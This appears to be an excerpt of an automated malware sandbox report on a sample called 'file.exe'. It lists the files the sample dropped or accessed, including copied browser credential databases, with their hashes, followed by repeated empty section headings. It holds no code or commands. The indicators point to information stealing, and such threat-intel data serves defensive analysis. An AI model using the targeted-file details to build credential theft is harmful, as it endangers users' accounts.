C:\ProgramData\Microsoft\Network\Downloader\qmgr.db	Extensible storage engine DataBase, version 0x620, checksum 0xe5740021, page size 16384, DirtyShutdown, Windows version 10.0	6601A1B69DF7285DE1CFD02D02D1409F	CE51EB94BAA3B52AC5ACC73AD643CF697BD24425	33BB6AE81704C0FEC08CB99354BD106A289550B9E9C3CA6D6CA7FAC80F5DCB3D
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	4C24412D4F060F4632C0BD68CC9ECB54	3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF	411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vvwfq23h.o4c.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\sp4c0p22.default-release\cert9.db	SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 7, database pages 7, cookie 0x5, schema 4, UTF-8, version-valid-for 7	CA2638E4884BBF9BF114A2362BDF7166	6C7D4FBE6FD32EDD6B9246D42C03EAF9B0444677	3DA02AD760D44C75B4B4768E246C6C6FA60330AB0B2D155C9A9F21E3F65613C1
C:\Users\user\AppData\Local\Temp\sp4c0p22.default-release\key4.db	SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2	BDD416B4CDA202FBECDA64E322383E0A	9648E083239C643A03D024CF42D06FEBCCFC3989	7EF6BD5E3293949D174DBC2BFD59E9DEE3811CE5B01BAB894A8E0AA4BA6DE936
C:\Users\user\AppData\Local\Temp\tmp2F6E.tmp.dat	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2	B612FC06C34BEEBCC6EA05BDE1DCC9F4	1F08BDF75A2CBC40FD342A24D99A7075648C431D	79F8BB304FA31A232F0BDA8B07B9CB87C58EBF67085B88077C2C73554E31C2C2
C:\Users\user\AppData\Local\Temp\tmp315D.tmp.dat	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3	369B6DD66F1CAD49D0952C40FEB9AD41	D05B2DE29433FB113EC4C558FF33087ED7481DD4	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
C:\Users\user\AppData\Local\Temp\tmp5C61.tmp.dat	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7	CFFF4E2B77FC5A18AB6323AF9BF95339	3AA2C2115A8EB4516049600E8832E9BFFE0C2412	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
C:\Users\user\AppData\Local\Temp\tmp8EFE.tmp.dat	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4	975EB5A66B745A4E80F115C4E014A785	5E06CC0DD91C0D9B5FA9F446175EAA2E72E20172	49CC538CF3E5B29BCE4D7D2905042BA38571947AC433BEBDEF58B43874BA84D3
C:\Users\user\AppData\Local\Temp\tmp9256.tmp.dat	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\Users\user\AppData\Local\Temp\tmp976F.tmp.dat	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1	4D950F6445B3766514BA266D6B1F3325	1C2B99FFD0C9130C0B51DA5349A258CA8B92F841	765D3A5B0D341DDC51D271589F00426B2531D295CCC2C2DE10FDD4790C796916
C:\Users\user\AppData\Local\Temp\tmp9F86.tmp.dat	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1	F2B4FB2D384AA4E4D6F4AEB0BBA217DC	2CD70CFB3CE72D9B079170C360C1F563B6BF150E	1ECC07CD1D383472DAD33D2A5766625009EA5EACBAEDE2417ADA1842654CBBC8
C:\Users\user\AppData\Local\Temp\tmp9FB6.tmp.dat	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8	7F784E8E9051D8E70834C231AE5CC670	FA92DDE2E8DD8599EA458CC8488123CB60AD0DC1	1CEE1D9084D2C05B68B40073E4E6FE380128B61988409D60A9F5CBFD7AE964F6
C:\Users\user\AppData\Local\Temp\tmpBA4B.tmp.dat	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1	9E68EA772705B5EC0C83C2A97BB26324	243128040256A9112CEAC269D56AD6B21061FF80	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
C:\Users\user\AppData\Local\Temp\tmpE29F.tmp.dat	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	46A8B7CD1CB434A5C8CE3CF3C7825DD9	518804A81A13456A077723A4384FBD2E20EFD1BF	9E18C03AD835DCA2E633226FDA3D0DE1FA4B46D9AAAA80FCA6D79FF4EC296B76
C:\Users\user\AppData\Local\Temp\tmpF0C5.tmp.dat	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1	52701A76A821CDDBC23FB25C3FCA4968	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
C:\Users\user\AppData\Local\Temp\tmpFE3A.tmp.dat	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1	7B955D976803304F2C0505431A0CF1CF	E29070081B18DA0EF9D98D4389091962E3D37216	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Curan158\Housty\begrets.inc	HTML document, ASCII text, with CRLF line terminators	5343C1A8B203C162A3BF3870D9F50FD4	04B5B886C20D88B57EEA6D8FF882624A4AC1E51D	DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Maeterlinck.Mid152	data	8817ABE755D6155C0CE5F1C47ED41304	2696075A18D76B6730BCCC14AF891DE3EAC88C5D	DBFBB6848571304DC04BEC19EF733105388887EDA1DC52C7DBB605815B67C9AC
C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo	ASCII text, with very long lines (60465), with no line terminators	32C7272D1BC1F9F0AF8AF047E4F2732C	52F89038555C67A8FCDD6F415F0951990ED01ABB	A6FFF8637295C331DFC91CE1686C05030AA64AD94538B8CDC29AE58F4DCDE34C
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	JSON data	DCA83F08D448911A14C22EBCACC5AD57	91270525521B7FE0D986DB19747F47D34B6318AD	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9

Windows Analysis Report
file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
file.exe

Malware Threat Intel
Provided by